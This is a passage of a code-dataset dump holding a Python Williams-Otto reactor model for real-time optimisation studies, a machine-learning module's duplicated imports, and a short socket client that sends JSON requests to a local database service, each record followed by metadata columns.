        # array looks suspect -- verify this executes under the casadi
        # version in use.
        x_res = np.zeros((6, 1))
        x_res[0, 0] = (Fa - r1 - Fr * Xa) / Mt
        x_res[1, 0] = (Fb - r1 - r2 - Fr * Xb) / Mt
        x_res[2, 0] = (+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt
        x_res[3, 0] = (+ 2 * r2 - Fr * Xe) / Mt
        x_res[4, 0] = (+ r2 - 0.5 * r3 - Fr * Xp) / Mt
        x_res[5, 0] = (+ 1.5 * r3 - Fr * Xg) / Mt
        # Define vectors with names of input variables
        ODEeq = [0 * x]  # placeholder ODE (the model is purely algebraic here)
        # Declare algebraic equations (steady-state component mass balances)
        Aeq = []
        Aeq += [(Fa - r1 - Fr * Xa) / Mt]
        Aeq += [(Fb - r1 - r2 - Fr * Xb) / Mt]
        Aeq += [(+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt]
        Aeq += [(+ 2 * r2 - Fr * Xe) / Mt]
        Aeq += [(+ r2 - 0.5 * r3 - Fr * Xp) / Mt]
        Aeq += [(+ 1.5 * r3 - Fr * Xg) / Mt]
        return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs

    def integrator_system(self):
        """Build and return a casadi Newton rootfinder solver(w0, u) -> w
        for the algebraic equations from DAE_system().  (No time integration
        happens here, despite the historical docstring/name.)
        """
        xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = self.DAE_system()
        VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
        solver = rootfinder('solver', 'newton', VV)
        return solver

    def WO_obj_sys_ca(self, u):
        # Noisy negative economic objective at steady state; the np.array is
        # a nominal steady-state composition used as the Newton initial guess.
        x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
        Fb = u[0]
        Tr = u[1]  # unused in the expression below
        Fa = 1.8275
        Fr = Fa + Fb
        obj = -(1043.38 * x[4] * Fr +
                20.92 * x[3] * Fr -
                79.23 * Fa -
                118.34 * Fb) + 0.5 * np.random.normal(0., 1)
        return float(obj)

    def WO_obj_sys_ca_noise_less(self, u):
        # Deterministic variant of WO_obj_sys_ca (noise term commented out).
        x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
        Fb = u[0]
        Tr = u[1]  # unused in the expression below
        Fa = 1.8275
        Fr = Fa + Fb
        obj = -(1043.38 * x[4] * Fr +
                20.92 * x[3] * Fr -
                79.23 * Fa -
                118.34 * Fb)  # + 0.5*np.random.normal(0., 1)
        return float(obj)

    def WO_con1_sys_ca(self, u):
        # Noisy constraint value: Xa - 0.12 + small Gaussian noise.
        x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
        pcon1 = x[0] - 0.12 + 5e-4 * np.random.normal(0., 1)
        return float(pcon1.toarray()[0])

    def WO_con2_sys_ca(self, u):
        # Noisy constraint value: Xg - 0.08 + small Gaussian noise.
        x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
        pcon2 = x[5] - 0.08 + 5e-4 * np.random.normal(0., 1)
        return float(pcon2.toarray()[0])

    def WO_con1_sys_ca_noise_less(self, u):
        # Deterministic variant of WO_con1_sys_ca.
        x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
        pcon1 = x[0] - 0.12  # + 5e-4*np.random.normal(0., 1)
        return float(pcon1.toarray()[0])

    def WO_con2_sys_ca_noise_less(self, u):
        # Deterministic variant of WO_con2_sys_ca.
        x = self.eval(np.array([0.114805, 0.525604, 0.0260265, 0.207296, 0.0923376, 0.0339309]), u)
        pcon2 = x[5] - 0.08  # + 5e-4*np.random.normal(0., 1)
        return float(pcon2.toarray()[0])
class WO_model:
    """Williams-Otto approximate *model* (two-reaction kinetics, no Xc
    intermediate), used alongside the WO_system plant above in RTO studies.
    """
    # Parameters
    # NOTE(review): method bodies resolve Fa/Mt/phi1/... to the module-level
    # globals of the same names (class attributes are not in method scope).
    Fa = 1.8275
    Mt = 2105.2
    # kinetic parameters (reparametrized Arrhenius form, see k1/k2 below)
    phi1 = - 3.
    psi1 = -17.
    phi2 = - 4.
    psi2 = -29.
    # Reference temperature
    Tref = 110. + 273.15  # [=] K.

    def __init__(self):
        # Build symbols once; self.eval is a Newton rootfinder mapping
        # (initial guess, u) -> steady-state algebraic states.
        self.xd, self.xa, self.u, self.ODEeq, self.Aeq, self.states, self.algebraics, self.inputs = self.DAE_model()
        self.eval = self.integrator_model()

    def DAE_model(self):
        """Create the casadi symbols and the model's algebraic residuals.

        NOTE: symbols are injected into globals() by name ('x', 'Xa', 'Xb',
        'Xe', 'Xp', 'Xg', 'Fb', 'Tr'); this mutates module globals.
        """
        # Define vectors with names of states
        states = ['x']
        nd = len(states)
        xd = SX.sym('xd', nd)
        for i in range(nd):
            globals()[states[i]] = xd[i]
        # Define vectors with names of algebraic variables
        algebraics = ['Xa', 'Xb', 'Xe', 'Xp', 'Xg']
        na = len(algebraics)
        xa = SX.sym('xa', na)
        for i in range(na):
            globals()[algebraics[i]] = xa[i]
        # Define vectors with names of input variables
        inputs = ['Fb', 'Tr']
        nu = len(inputs)
        u = SX.sym("u", nu)
        for i in range(nu):
            globals()[inputs[i]] = u[i]
        # Rate constants reparametrized around Tref (Tr in deg C)
        k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
        k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
        # reaction rate
        Fr = Fa + Fb
        r1 = k1 * Xa * Xb * Xb * Mt
        r2 = k2 * Xa * Xb * Xp * Mt
        ODEeq = [0 * x]  # placeholder ODE (the model is purely algebraic here)
        # Declare algebraic equations (steady-state component mass balances)
        Aeq = []
        Aeq += [Fa - r1 - r2 - Fr * Xa]
        Aeq += [Fb - 2 * r1 - r2 - Fr * Xb]
        Aeq += [+ 2 * r1 - Fr * Xe]
        Aeq += [+ r1 - r2 - Fr * Xp]
        Aeq += [+ 3 * r2 - Fr * Xg]
        return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs

    def integrator_model(self):
        """Build and return a casadi Newton rootfinder solver(w0, u) -> w
        for the model's algebraic equations.  (No time integration happens
        here, despite the historical docstring/name.)
        """
        xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = self.DAE_model()
        VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
        solver = rootfinder('solver', 'newton', VV)
        # model = functools.partial(solver, np.zeros(np.shape(xa)))
        return solver

    def WO_obj_ca(self, u):
        # Negative economic objective at the model steady state for
        # u = [Fb, Tr]; the np.array is a nominal composition initial guess.
        x = self.eval(np.array([0.114805, 0.525604, 0.207296, 0.0923376, 0.0339309]), u)
        Fb = u[0]
        Tr = u[1]  # unused in the expression below
        Fa = 1.8275
        Fr = Fa + Fb
        obj = -(1043.38 * x[3] * Fr +
                20.92 * x[2] * Fr -
                79.23 * Fa -
                118.34 * Fb)
        return obj

    def WO_con1_model_ca(self, u):
        # Returns -(Xa - 0.12) evaluated at the model steady state.
        x = self.eval(np.array([0.114805, 0.525604, 0.207296, 0.0923376, 0.0339309]), u)
        pcon1 = x[0] - 0.12  # + 5e-4*np.random.normal(1., 1)
        return -pcon1.toarray()[0]

    def WO_con2_model_ca(self, u):
        # Returns -(Xg - 0.08) evaluated at the model steady state.
        x = self.eval(np.array([0.114805, 0.525604, 0.207296, 0.0923376, 0.0339309]), u)
        pcon2 = x[4] - 0.08  # + 5e-4*np.random.normal(1., 1)
        return -pcon2.toarray()[0]
def con_empty(u):
    """Placeholder constraint: ignores the input and always returns 0."""
    return -0.
def obj_empty(u):
    """Placeholder objective: ignores the input and always returns 0."""
    return 0.
#
# def DAE_model():
# # Parameters
# Fa = 1.8275
# Mt = 2105.2
# # kinetic parameters
# phi1 = - 3.
# psi1 = -17.
# phi2 = - 4.
# psi2 = -29.
# # Reference temperature
# Tref = 110. + 273.15 # [=] K.
# # Define vectors with names of states
# states = ['x']
# nd = len(states)
# xd = SX.sym('xd', nd)
# for i in range(nd):
# globals()[states[i]] = xd[i]
#
# # Define vectors with names of algebraic variables
# algebraics = ['Xa', 'Xb', 'Xe', 'Xp', 'Xg']
# na = len(algebraics)
# xa = SX.sym('xa', na)
# for i in range(na):
# globals()[algebraics[i]] = xa[i]
#
# # Define vectors with banes of input variables
# inputs = ['Fb', 'Tr']
# nu = len(inputs)
# u = SX.sym("u", nu)
# for i in range(nu):
# globals()[inputs[i]] = u[i]
#
# k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
# k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
#
# # reaction rate
# Fr = Fa + Fb
# r1 = k1 * Xa * Xb * Xb * Mt
# r2 = k2 * Xa * Xb * Xp * Mt
# ODEeq = [0 * x]
#
# # Declare algebraic equations
# Aeq = []
#
# Aeq += [Fa - r1 - r2 - Fr * Xa]
# Aeq += [Fb - 2 * r1 - r2 - Fr * Xb]
# Aeq += [+ 2 * r1 - Fr * Xe]
# Aeq += [+ r1 - r2 - Fr * Xp]
# Aeq += [+ 3 * r2 - Fr * Xg]
#
# return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
#
#
# def integrator_model():
# """
# This function constructs the integrator to be suitable with casadi environment, for the equations of the model
# and the objective function with variable time step.
# inputs: NaN
# outputs: F: Function([x, u, dt]--> [xf, obj])
# """
#
# xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = DAE_model()
# VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
# solver = rootfinder('solver', 'newton', VV)
#
# # model = functools.partial(solver, np.zeros(np.shape(xa)))
# return solver
#
#
# def WO_obj_ca(u):
# solver = integrator_model()
# x = solver(np.zeros(5), u)
# Fb = u[0]
# Tr = u[1]
# Fa = 1.8275
# Fr = Fa + Fb
#
# obj = -(1043.38 * x[3] * Fr +
# 20.92 * x[2] * Fr -
# 79.23 * Fa -
# 118.34 * Fb)
#
# return obj
#
#
# def WO_con1_model_ca(u):
# solver = integrator_model()
# x = solver(np.zeros(5), u)
# pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(1., 1)
# return -pcon1.toarray()[0]
#
#
# def WO_con2_model_ca(u):
# solver = integrator_model()
# x = solver(np.zeros(5), u)
# pcon2 = x[4] - 0.08 # + 5e-4*np.random.normal(1., 1)
# return -pcon2.toarray()[0]
#
# # Parameters
#
#
#
#
# def DAE_system():
# Fa = 1.8275
# Mt = 2105.2
# # kinetic parameters
# phi1 = - 3.
# psi1 = -17.
# phi2 = - 4.
# psi2 = -29.
# # Reference temperature
# Tref = 110. + 273.15 # [=] K.
#
# # Define vectors with names of states
# states = ['x']
# nd = len(states)
# xd = SX.sym('xd', nd)
# for i in range(nd):
# globals()[states[i]] = xd[i]
#
# # Define vectors with names of algebraic variables
# algebraics = ['Xa', 'Xb', 'Xc', 'Xe', 'Xp', 'Xg']
# na = len(algebraics)
# xa = SX.sym('xa', na)
# for i in range(na):
# globals()[algebraics[i]] = xa[i]
#
# inputs = ['Fb', 'Tr']
# nu = len(inputs)
# u = SX.sym("u", nu)
# for i in range(nu):
# globals()[inputs[i]] = u[i]
#
# # Reparametrization
# k1 = 1.6599e6 * np.exp(-6666.7 / (Tr + 273.15))
# k2 = 7.2117e8 * np.exp(-8333.3 / (Tr + 273.15))
# k3 = 2.6745e12 * np.exp(-11111. / (Tr + 273.15))
#
# # reaction rate
# Fr = Fa + Fb
# r1 = k1 * Xa * Xb * Mt
# r2 = k2 * Xb * Xc * Mt
# r3 = k3 * Xc * Xp * Mt
#
# # residual for x
# x_res = np.zeros((6, 1))
# x_res[0, 0] = (Fa - r1 - Fr * Xa) / Mt
# x_res[1, 0] = (Fb - r1 - r2 - Fr * Xb) / Mt
# x_res[2, 0] = (+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt
# x_res[3, 0] = (+ 2 * r2 - Fr * Xe) / Mt
# x_res[4, 0] = (+ r2 - 0.5 * r3 - Fr * Xp) / Mt
# x_res[5, 0] = (+ 1.5 * r3 - Fr * Xg) / Mt
# # Define vectors with banes of input variables
#
# ODEeq = [0 * x]
#
# # Declare algebraic equations
# Aeq = []
#
# Aeq += [(Fa - r1 - Fr * Xa) / Mt]
# Aeq += [(Fb - r1 - r2 - Fr * Xb) / Mt]
# Aeq += [(+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt]
# Aeq += [(+ 2 * r2 - Fr * Xe) / Mt]
# Aeq += [(+ r2 - 0.5 * r3 - Fr * Xp) / Mt]
# Aeq += [(+ 1.5 * r3 - Fr * Xg) / Mt]
#
# return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
#
#
# def integrator_system():
# """
# This function constructs the integrator to be suitable with casadi environment, for the equations of the model
# and the objective function with variable time step.
# inputs: NaN
# outputs: F: Function([x, u, dt]--> [xf, obj])
# """
#
# xd, xa, u, ODEeq, Aeq, states, algebraics, inputs = DAE_system()
# VV = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
# solver = rootfinder('solver', 'newton', VV)
#
# return solver
#
#
# def WO_obj_sys_ca(u):
# solver = integrator_system()
# x = solver(np.zeros(6), u)
# Fb = u[0]
# Tr = u[1]
# Fa = 1.8275
# Fr = Fa + Fb
#
# obj = -(1043.38 * x[4] * Fr +
# 20.92 * x[3] * Fr -
# 79.23 * Fa -
# 118.34 * Fb)
#
# return obj
#
#
# def WO_con1_sys_ca(u):
# solver = integrator_system()
# x = solver(np.zeros(6), u)
# pcon1 = x[0] - 0.12 # + 5e-4*np.random.normal(1., 1)
#
# return -pcon1
#
#
# def WO_con2_sys_ca(u):
# solver = integrator_system()
# x = solver(np.zeros(6), u)
# pcon2 = x[5] - 0.08 # + 5e-4*np.random.normal(1., 1)
#
# return -pcon2
#
# scipy.optimize.minimize settings used by the WO_Model_*_opt helpers below.
options = {'disp': False, 'maxiter': 10000}  # solver options
# Parameters
# Module-level Williams-Otto constants read by the WO_nonlinear_* functions.
Fa = 1.8275
Mt = 2105.2
# kinetic parameters
phi1 = - 3.
psi1 = -17.
phi2 = - 4.
psi2 = -29.
# Reference temperature
Tref = 110. + 273.15  # [=] K.
# --- residual function for model opt --- #
def WO_nonlinear_f_model_opt(x, u_):
    """Sum of squared steady-state residuals of the two-reaction WO model.

    Scalar form of WO_nonlinear_f_model, suitable as an objective for
    scipy.optimize.minimize.  x holds the five mass fractions
    [Xa, Xb, Xe, Xp, Xg]; u_ = [Fb, Tr].
    """
    Fb, Tr = u_[0], u_[1]
    Xa, Xb, Xe, Xp, Xg = x[0], x[1], x[2], x[3], x[4]
    # Rate constants reparametrized around Tref (module-level constant)
    k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
    k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
    Fr = Fa + Fb
    r1 = k1 * Xa * Xb * Xb * Mt
    r2 = k2 * Xa * Xb * Xp * Mt
    residuals = np.array([
        Fa - r1 - r2 - Fr * Xa,
        Fb - 2 * r1 - r2 - Fr * Xb,
        + 2 * r1 - Fr * Xe,
        + r1 - r2 - Fr * Xp,
        + 3 * r2 - Fr * Xg,
    ])
    return np.sum(residuals ** 2)
# --- residual function for model --- #
def WO_nonlinear_f_model(u_, x):
    """Steady-state residual vector of the two-reaction WO model.

    Returns a (5, 1) numpy array (shape matters: broyden1 callers rely on
    it).  x holds [Xa, Xb, Xe, Xp, Xg]; u_ = [Fb, Tr].  Note the argument
    order is (u_, x) so it can be partially applied on u_.
    """
    Fb, Tr = u_[0], u_[1]
    Xa, Xb, Xe, Xp, Xg = x[0], x[1], x[2], x[3], x[4]
    # Rate constants reparametrized around Tref (module-level constant)
    k1 = np.exp(phi1) * np.exp((Tref / (Tr + 273.15) - 1) * psi1)
    k2 = np.exp(phi2) * np.exp((Tref / (Tr + 273.15) - 1) * psi2)
    Fr = Fa + Fb
    r1 = k1 * Xa * Xb * Xb * Mt
    r2 = k2 * Xa * Xb * Xp * Mt
    return np.array([
        [Fa - r1 - r2 - Fr * Xa],
        [Fb - 2 * r1 - r2 - Fr * Xb],
        [+ 2 * r1 - Fr * Xe],
        [+ r1 - r2 - Fr * Xp],
        [+ 3 * r2 - Fr * Xg],
    ])
# --- WO model objective --- #
def WO_Model_obj(u):
    """Negative economic profit of the WO model at steady state, u = [Fb, Tr].

    The steady state is found with Broyden's method on the model residuals.
    """
    start_point = 0.2 * np.ones((5, 1))
    residual_fn = functools.partial(WO_nonlinear_f_model, u)
    steady_x = broyden1(residual_fn, start_point, f_tol=1e-12)
    # definitions
    feed_a = 1.8275
    Fb = u[0]
    Fr = feed_a + Fb
    # calculating objective (revenue from P and E minus feed costs)
    return -(1043.38 * steady_x[3, 0] * Fr +
             20.92 * steady_x[2, 0] * Fr -
             79.23 * feed_a -
             118.34 * Fb)
# --- WO model con1 --- #
def WO_Model_con1(u):
    """Returns -(Xa - 0.12) at the WO model steady state (Broyden solve)."""
    start_point = 0.2 * np.ones((5, 1))
    residual_fn = functools.partial(WO_nonlinear_f_model, u)
    steady_x = broyden1(residual_fn, start_point, f_tol=1e-12)
    return -(steady_x[0, 0] - 0.12)
# --- WO model con1 opt --- #
def WO_Model_con1_opt(u):
    """Returns -(Xa - 0.12) at the WO model steady state, found by minimizing
    the squared-residual objective WO_nonlinear_f_model_opt with BFGS.

    u = [Fb, Tr]; uses the module-level `options` dict for the solver.
    """
    x_guess = np.ones((5, 1)) * 0.2
    # BUG FIX: args must be a tuple. args=(u) is just u itself, and scipy
    # calls fun(x, *args), which would unpack u's elements as separate
    # positional arguments instead of passing u as one argument.
    res = minimize(WO_nonlinear_f_model_opt, x_guess, args=(u,),
                   method='BFGS', options=options, tol=1e-12)
    x_solved = res.x
    # calculating con1
    con1 = x_solved[0] - 0.12
    return -con1
# --- WO model con2 --- #
def WO_Model_con2(u):
    """Returns -(Xg - 0.08) at the WO model steady state (Broyden solve)."""
    start_point = 0.2 * np.ones((5, 1))
    residual_fn = functools.partial(WO_nonlinear_f_model, u)
    steady_x = broyden1(residual_fn, start_point, f_tol=1e-12)
    return -(steady_x[4, 0] - 0.08)
# --- WO model con2 opt --- #
def WO_Model_con2_opt(u):
    """Returns -(Xg - 0.08) at the WO model steady state, found by minimizing
    the squared-residual objective WO_nonlinear_f_model_opt with BFGS.

    u = [Fb, Tr]; uses the module-level `options` dict for the solver.
    """
    x_guess = np.ones((5, 1)) * 0.2
    # BUG FIX: args must be a tuple. args=(u) is just u itself, and scipy
    # calls fun(x, *args), which would unpack u's elements as separate
    # positional arguments instead of passing u as one argument.
    res = minimize(WO_nonlinear_f_model_opt, x_guess, args=(u,),
                   method='BFGS', options=options, tol=1e-12)
    x_solved = res.x
    # calculating con2
    con2 = x_solved[4] - 0.08
    return -con2
# Parameters
# NOTE(review): this re-declares the same module-level WO constants defined
# above (values identical); kept for the module-level DAE_system below.
Fa = 1.8275
Mt = 2105.2
# kinetic parameters
phi1 = - 3.
psi1 = -17.
phi2 = - 4.
psi2 = -29.
# Reference temperature
Tref = 110. + 273.15  # [=] K.
def DAE_system():
    """Create the casadi symbols and the plant's algebraic residuals
    (module-level twin of WO_system.DAE_system).

    NOTE: symbols are injected into globals() by name ('x', 'Xa'..'Xg',
    'Fb', 'Tr'); this mutates module globals as a side effect.
    """
    # Define vectors with names of states
    states = ['x']
    nd = len(states)
    xd = SX.sym('xd', nd)
    for i in range(nd):
        globals()[states[i]] = xd[i]
    # Define vectors with names of algebraic variables
    algebraics = ['Xa', 'Xb', 'Xc', 'Xe', 'Xp', 'Xg']
    na = len(algebraics)
    xa = SX.sym('xa', na)
    for i in range(na):
        globals()[algebraics[i]] = xa[i]
    inputs = ['Fb', 'Tr']
    nu = len(inputs)
    u = SX.sym("u", nu)
    for i in range(nu):
        globals()[inputs[i]] = u[i]
    # Reparametrization: Arrhenius-type rate constants (Tr in deg C)
    k1 = 1.6599e6 * np.exp(-6666.7 / (Tr + 273.15))
    k2 = 7.2117e8 * np.exp(-8333.3 / (Tr + 273.15))
    k3 = 2.6745e12 * np.exp(-11111. / (Tr + 273.15))
    # reaction rate
    Fr = Fa + Fb
    r1 = k1 * Xa * Xb * Mt
    r2 = k2 * Xb * Xc * Mt
    r3 = k3 * Xc * Xp * Mt
    # residual for x -- computed but never used; Aeq below repeats the same
    # balances symbolically.
    # NOTE(review): assigning symbolic SX expressions into a float numpy
    # array looks suspect -- verify this runs under the casadi version in use.
    x_res = np.zeros((6, 1))
    x_res[0, 0] = (Fa - r1 - Fr * Xa) / Mt
    x_res[1, 0] = (Fb - r1 - r2 - Fr * Xb) / Mt
    x_res[2, 0] = (+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt
    x_res[3, 0] = (+ 2 * r2 - Fr * Xe) / Mt
    x_res[4, 0] = (+ r2 - 0.5 * r3 - Fr * Xp) / Mt
    x_res[5, 0] = (+ 1.5 * r3 - Fr * Xg) / Mt
    # Define vectors with names of input variables
    ODEeq = [0 * x]  # placeholder ODE (the system is purely algebraic here)
    # Declare algebraic equations (steady-state component mass balances)
    Aeq = []
    Aeq += [(Fa - r1 - Fr * Xa) / Mt]
    Aeq += [(Fb - r1 - r2 - Fr * Xb) / Mt]
    Aeq += [(+ 2 * r1 - 2 * r2 - r3 - Fr * Xc) / Mt]
    Aeq += [(+ 2 * r2 - Fr * Xe) / Mt]
    Aeq += [(+ r2 - 0.5 * r3 - Fr * Xp) / Mt]
    Aeq += [(+ 1.5 * r3 - Fr * Xg) / Mt]
    return xd, xa, u, ODEeq, Aeq, states, algebraics, inputs
def integrator_system():
    """Build a casadi Newton rootfinder solver(w0, u) -> w that solves the
    plant's algebraic equations from DAE_system().  (No time integration is
    performed, despite the historical name.)
    """
    _xd, xa, u, _ode, Aeq, _states, _alg, _inputs = DAE_system()
    residual_fn = Function('vfcn', [xa, u], [vertcat(*Aeq)], ['w0', 'u'], ['w'])
    return rootfinder('solver', 'newton', residual_fn)
def WO_obj_sys_ca(u):
    """Negative economic objective of the WO plant at steady state,
    u = [Fb, Tr], starting the Newton solve from the zero vector."""
    steady_x = integrator_system()(np.zeros(6), u)
    Fb = u[0]
    Tr = u[1]  # unused in the expression below
    feed_a = 1.8275
    Fr = feed_a + Fb
    return -(1043.38 * steady_x[4] * Fr +
             20.92 * steady_x[3] * Fr -
             79.23 * feed_a -
             118.34 * Fb)
def WO_con1_sys_ca(u):
    """Returns -(Xa - 0.12) at the WO plant steady state (noise disabled)."""
    steady_x = integrator_system()(np.zeros(6), u)
    residual = steady_x[0] - 0.12  # + 5e-4*np.random.normal(1., 1)
    return -residual.toarray()[0]
def WO_con2_sys_ca(u):
    """Returns -(Xg - 0.08) at the WO plant steady state (noise disabled)."""
    steady_x = integrator_system()(np.zeros(6), u)
    residual = steady_x[5] - 0.08  # + 5e-4*np.random.normal(1., 1)
    return -residual.toarray()[0]
| 27.237975
| 118
| 0.509852
| 3,315
| 21,518
| 3.241629
| 0.069382
| 0.013028
| 0.026056
| 0.015355
| 0.902941
| 0.898009
| 0.893914
| 0.885353
| 0.883771
| 0.881537
| 0
| 0.106506
| 0.314946
| 21,518
| 789
| 119
| 27.272497
| 0.622482
| 0.376568
| 0
| 0.754875
| 0
| 0
| 0.011032
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103064
| false
| 0
| 0.036212
| 0
| 0.281337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7d513bc90ee257215305e25f89415d4ac72687c
| 2,967
|
py
|
Python
|
multiinstance/None.py
|
Dzeiberg/multiinstance
|
95b70e066610b1935cda9086d8fb8609809e7d15
|
[
"Apache-2.0"
] | null | null | null |
multiinstance/None.py
|
Dzeiberg/multiinstance
|
95b70e066610b1935cda9086d8fb8609809e7d15
|
[
"Apache-2.0"
] | null | null | null |
multiinstance/None.py
|
Dzeiberg/multiinstance
|
95b70e066610b1935cda9086d8fb8609809e7d15
|
[
"Apache-2.0"
] | null | null | null |
# Cell
from .utils import *
from .distanceApproaches import *
from .data.syntheticData import buildDataset,getBag
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.neighbors import KernelDensity
import scipy.stats as ss
from tqdm.notebook import tqdm
# Cell
from .utils import *
from .distanceApproaches import *
from .data.syntheticData import buildDataset,getBag
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.neighbors import KernelDensity
import scipy.stats as ss
from tqdm.notebook import tqdm
# Cell
from .utils import *
from .distanceApproaches import *
from .data.syntheticData import buildDataset,getBag
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.neighbors import KernelDensity
import scipy.stats as ss
from tqdm.notebook import tqdm
# Cell
import autograd
from autograd import grad,jacobian,hessian
from autograd.scipy import stats as agss
import autograd.numpy as np
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
import scipy.stats as ss
import os
from scipy.optimize import minimize
from glob import glob
from .likelihoodMethods import *
import scipy.stats as ss
from .data.syntheticData import buildDataset
from .utils import *
from .agglomerative_clustering import AgglomerativeClustering
# Pin this process to CPUs 20-39 (NOTE(review): host-specific; raises OSError
# on machines with fewer CPUs -- confirm before reuse).
os.sched_setaffinity(0,set(range(20,40)))
# Cell
import autograd
from autograd import grad,jacobian,hessian
from autograd.scipy import stats as agss
import autograd.numpy as np
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
import scipy.stats as ss
import os
from scipy.optimize import minimize
from glob import glob
from .likelihoodMethods import *
import scipy.stats as ss
from .data.syntheticData import buildDataset
from .utils import *
from .agglomerative_clustering import AgglomerativeClustering
# Pin this process to CPUs 20-39 (NOTE(review): host-specific; raises OSError
# on machines with fewer CPUs -- confirm before reuse).
os.sched_setaffinity(0,set(range(20,40)))
# Cell
import autograd
from autograd import grad,jacobian,hessian
from autograd.scipy import stats as agss
import autograd.numpy as np
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
import scipy.stats as ss
import os
from scipy.optimize import minimize
from glob import glob
from .likelihoodMethods import *
import scipy.stats as ss
from .data.syntheticData import buildDataset
from .utils import *
from .agglomerative_clustering import AgglomerativeClustering
# Pin this process to CPUs 20-39 (NOTE(review): host-specific; raises OSError
# on machines with fewer CPUs -- confirm before reuse).
os.sched_setaffinity(0,set(range(20,40)))
| 21.816176
| 61
| 0.827098
| 420
| 2,967
| 5.807143
| 0.133333
| 0.067651
| 0.059041
| 0.066421
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.005814
| 0.130435
| 2,967
| 136
| 62
| 21.816176
| 0.939535
| 0.009774
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.965517
| 0
| 0.965517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
c7dedc3412466e3344ec5f98c60dd41f4b02ca92
| 1,576
|
py
|
Python
|
server/db/test.py
|
e7/treasure-box
|
1ad4818e7535b80a3ad3e0cb74087a2ce43a9dc8
|
[
"Apache-2.0"
] | null | null | null |
server/db/test.py
|
e7/treasure-box
|
1ad4818e7535b80a3ad3e0cb74087a2ce43a9dc8
|
[
"Apache-2.0"
] | null | null | null |
server/db/test.py
|
e7/treasure-box
|
1ad4818e7535b80a3ad3e0cb74087a2ce43a9dc8
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python
# -*- coding:utf-8 -*-
import socket
import errno
import struct
import time
import json
if "__main__" == __name__:
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.connect(("127.0.0.1", 8889))
'''
context = json.dumps({"interface":"insert", "email":"jackzxty@126.com"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
context = json.dumps({"interface":"update", "uid":"1", "email":"chg"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
context = json.dumps({"interface":"delete", "uid":"16"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
'''
context = json.dumps({"interface":"select", "uid":"26"})
data = struct.pack("!4I", 1000, 16, len(context), 0)
skt.sendall(data + context)
rsp = skt.recv(4096)
